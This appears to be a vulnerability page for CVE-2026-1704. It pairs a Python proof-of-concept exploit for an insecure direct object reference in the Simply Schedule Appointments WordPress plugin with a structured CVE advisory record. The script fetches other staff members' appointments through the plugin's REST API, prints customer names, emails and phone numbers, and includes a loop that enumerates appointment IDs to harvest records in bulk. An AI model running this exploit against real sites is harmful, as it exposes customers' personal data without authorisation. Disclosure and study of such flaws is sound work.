CVE-2026-1704

import requests import sys # CVE-2026-1704 PoC - IDOR in Simply Schedule Appointments Plugin # Target: WordPress site with Simply Schedule Appointments plugin < 1.6.9.30 def exploit_idor(target_url, target_appointment_id, auth_cookie): """ Exploit IDOR vulnerability to access other staff members' appointments Args: target_url: Target WordPress site URL target_appointment_id: ID of appointment to access (can be any valid ID) auth_cookie: WordPress authentication cookie with ssa_manage_appointments capability """ # REST API endpoint for appointment retrieval endpoint = f"{target_url}/wp-json/ssa/v1/appointments/{target_appointment_id}" headers = { 'Cookie': auth_cookie, 'Content-Type': 'application/json', 'X-WP-Nonce': 'YOUR_REST_API_NONCE' # Obtain from page source } print(f"[*] Target: {endpoint}") print(f"[*] Requesting appointment ID: {target_appointment_id}") try: response = requests.get(endpoint, headers=headers, timeout=10) if response.status_code == 200: data = response.json() print("[+] SUCCESS! Retrieved appointment details:") print(f" Customer Name: {data.get('customer_name', 'N/A')}") print(f" Customer Email: {data.get('customer_email', 'N/A')}") print(f" Customer Phone: {data.get('customer_phone', 'N/A')}") print(f" Appointment Date: {data.get('start', 'N/A')}") return True elif response.status_code == 403: print("[-] Access denied - check permissions") else: print(f"[-] Unexpected response: {response.status_code}") except requests.RequestException as e: print(f"[-] Request failed: {e}") return False # Brute force appointment IDs to find records from other staff def enumerate_appointments(target_url, auth_cookie, start_id=1, end_id=1000): """ Enumerate appointment IDs to discover other staff members' appointments """ print(f"[*] Enumerating appointment IDs from {start_id} to {end_id}") for appt_id in range(start_id, end_id + 1): if exploit_idor(target_url, appt_id, auth_cookie): print(f"[!] Found accessible appointment ID: {appt_id}") if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2026-1704-poc.py <target_url> <appointment_id> <auth_cookie>") print("Example: python cve-2026-1704-poc.py https://example.com 123 'wordpress_logged_in_xxx='") sys.exit(1) target = sys.argv[1] appt_id = int(sys.argv[2]) cookie = sys.argv[3] exploit_idor(target, appt_id, cookie)

{"cve": {"id": "CVE-2026-1704", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:53:58.680", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.6.9.29. This is due to the `get_item_permissions_check` method granting access to users with the `ssa_manage_appointments` capability without validating staff ownership of the requested appointment. This makes it possible for authenticated attackers, with custom-level access and above (users granted the ssa_manage_appointments capability, such as Team Members), to view appointment records belonging to other staff members and access sensitive customer personally identifiable information via the appointment ID parameter."}, {"lang": "es", "value": "El plugin Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin para WordPress es vulnerable a la Referencia Directa Insegura a Objetos en todas las versiones hasta la 1.6.9.29, inclusive. Esto se debe a que el método 'get_item_permissions_check' otorga acceso a usuarios con la capacidad 'ssa_manage_appointments' sin validar la propiedad del personal sobre la cita solicitada. Esto hace posible que atacantes autenticados, con acceso de nivel personalizado y superior (usuarios a los que se les ha otorgado la capacidad ssa_manage_appointments, como los Miembros del Equipo), puedan ver registros de citas pertenecientes a otros miembros del personal y acceder a información personal identificable sensible del cliente a través del parámetro de ID de cita."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.21/includes/class-appointment-model.php#L1348", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.21/includes/class-appointment-model.php#L1436", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/class-appointment-model.php#L1348", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/class-appointment-model.php#L1436", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3480506%40simply-schedule-appointments%2Ftrunk&old=3475885%40simply-schedule-appointments%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c82f3864-13af-4ff6-824a-4c799a98f3f6?source=cve", "source": "[email protected]"}]}}